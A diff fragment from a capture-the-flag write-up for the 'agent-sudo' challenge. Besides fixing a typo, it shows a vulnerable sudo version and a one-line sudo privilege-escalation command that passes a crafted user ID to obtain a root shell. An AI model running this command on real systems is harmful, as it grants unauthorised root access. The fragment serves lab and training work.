BJConway/thm_writeups/challenges/agent-sudo.md

 Sudo version 1.8.21p2
 ```

-and we pass the crafed user ID from the CVE listing to `sudo -u` :
+and we pass the crafted user ID from the CVE listing to `sudo -u` :

 ```console
 james@agent-sudo:~$ sudo -u \#$((0xffffffff)) /bin/bash